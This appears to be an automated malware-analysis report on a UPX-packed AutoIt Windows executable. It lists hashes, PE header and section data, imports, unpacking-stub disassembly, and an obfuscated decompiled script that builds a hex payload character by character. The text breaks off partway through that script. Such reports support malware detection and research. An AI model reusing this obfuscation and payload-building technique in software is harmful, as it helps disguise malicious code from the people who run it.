SHA256:	a7ebedb978908d118423d5d542dfac659868feded8cc8b856a29cdef04d3c750
SHA512:	572d087ee6a57b49d9cea4bdf26ac48cdaa8671d11afafb2e29f4925369bb71bcf9221716f9e21385ed745aeafae34a725ea228b517efb91f0acd1ec0d03c9f4
SSDEEP:	12288:xXe9PPlowWX0t6mOQwg1Qd15CcYk0We1KZ:4hloDX0XOf4EZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

File Icon


Icon Hash:	0d1c295ae18c168a

Static PE Info

General
Entrypoint:	0x4eafe0
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x612E34EE [Tue Aug 31 13:55:58 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	ef471c0edf1877cd5a881a6a8bf647b9

Entrypoint Preview

Instruction
pushad
mov esi, 00497000h
lea edi, dword ptr [esi-00096000h]
push edi
jmp 00007F31EC8F7F1Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F31EC8F7F19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F31EC8F7EFFh
mov eax, 00000001h
add ebx, ebx
jne 00007F31EC8F7F19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F31EC8F7F1Dh
jne 00007F31EC8F7F3Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F31EC8F7F31h
dec eax
add ebx, ebx
jne 00007F31EC8F7F19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F31EC8F7EE6h
add ebx, ebx
jne 00007F31EC8F7F19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F31EC8F7F64h
xor ecx, ecx
sub eax, 03h
jc 00007F31EC8F7F23h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F31EC8F7F87h
sar eax, 1
mov ebp, eax
jmp 00007F31EC8F7F1Dh
add ebx, ebx
jne 00007F31EC8F7F19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F31EC8F7EDEh
inc ecx
add ebx, ebx
jne 00007F31EC8F7F19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F31EC8F7ED0h
add ebx, ebx
jne 00007F31EC8F7F19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F31EC8F7F01h
jne 00007F31EC8F7F1Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F31EC8F7EF6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F31EC8F7F20h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[RES] VS2012 UPD4 build 61030
[ASM] VS2012 UPD4 build 61030
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfe06c	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xec000	0x1206c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfe490	0x18	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xeb1c4	0x48	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x96000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x97000	0x55000	0x54400	False	0.98807840319	data	7.93564359033	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xec000	0x13000	0x12600	False	0.116749043367	data	2.92590052135	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xec354	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xec480	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 4292090908, next used block 4292090908	English	Great Britain
RT_STRING	0xd4ca0	0x594	data	English	Great Britain
RT_STRING	0xd5234	0x68a	data	English	Great Britain
RT_STRING	0xd58c0	0x490	data	English	Great Britain
RT_STRING	0xd5d50	0x5fc	data	English	Great Britain
RT_STRING	0xd634c	0x65c	data	English	Great Britain
RT_STRING	0xd69a8	0x466	data	English	Great Britain
RT_STRING	0xd6e10	0x158	data	English	Great Britain
RT_RCDATA	0xfccac	0xefc	data
RT_GROUP_ICON	0xfdbac	0x14	data	English	Great Britain
RT_GROUP_ICON	0xfdbc4	0x14	data	English	Great Britain
RT_VERSION	0xfdbdc	0xdc	data	English	Great Britain
RT_MANIFEST	0xfdcbc	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	AddAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetSaveFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetUseConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	VariantInit
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	socket

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Static AutoIT Info

General

Code:

#NoTrayIcon GLOBAL $X30GC0 = EXECUTE DIM $O31TOY7 = $X30GC0 (STRINGREPLACE ("EKOCEKOhEKOrEKO" , "EKO" , "" ) ) DIM $F33JS1NFK2 = $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8540 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) $F33JS1NFK2 &= $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) $F33JS1NFK2 &= $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) $F33JS1NFK2 &= $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & 